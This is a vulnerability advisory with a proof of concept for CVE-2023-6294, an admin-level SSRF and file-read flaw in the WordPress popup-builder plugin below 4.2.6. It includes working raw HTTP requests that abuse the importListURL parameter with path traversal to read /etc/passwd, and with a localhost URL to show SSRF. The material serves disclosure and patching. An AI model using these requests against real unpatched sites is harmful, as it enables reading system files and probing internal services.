popup-builder < 4.2.6 – Admin+ SSRF & File Read | CVE 2023-6294

Description

The plugin does not validate a parameter before making a request to it, which could allow users with the administrator role to perform SSRF attack in Multisite WordPress configurations.

Proof of Concept

1. Create a multi-site wordpress setup, i.e. using docker-containers, and setup a second "site" with a separate administrator (without super-admin/network-admin rights).
2. Install the popup-builder plugin and activate it for the network
3. Login as said new administrator to the separate site (here: "site2" at "/site2/").
4. In the admin dashboard, navigate to Popup Builder -> Add New and add a new dummy Subscription
5. Navigate to All Subscribers -> Import. Choose the dummy subscription and enter any text in the File-Field.
6. Intercept the HTTP request issued by submitting the import form, which will include a valid nonce.
7. Change the parameter "importListURL" to "../../../../../../../../../../../../../../../../etc/passwd":

POST /site2/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 156
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: [cookie]
Connection: close

action=sgpb_import_subscribers&nonce=7ab37e2ddd&popupSubscriptionList=8&importListURL=../../../../../../../../../../../../../../../../etc/passwd&beforeSend=

This will output the first line of /etc/passwd in the response:

<div class="subFormItem__title">
	root:x:0:0:root:/root:/bin/bash				
</div>

8. Alternatively, "importURL" can be set to any URL allowing for SSRF, i.e. "importListURL=http://localhost:1337" with a "python -m http.server 1337" serving a "hacked.txt":

POST /site2/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 130
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: [Cookies]
Connection: close

action=sgpb_import_subscribers&nonce=7ab37e2ddd&popupSubscriptionList=8&importListURL=http://localhost:1337/hacked.txt&beforeSend=

Response:

<div class="subFormItem__title">
	Hacked			
</div>

Output from python:

root@6bd896f15815:/var/www/html# python3 -m http.server --directory /tmp 1337       
Serving HTTP on 0.0.0.0 port 1337 (http://0.0.0.0:1337/) ...
127.0.0.1 - - [21/Nov/2023 15:05:01] "GET /hacked.txt HTTP/1.1" 200 -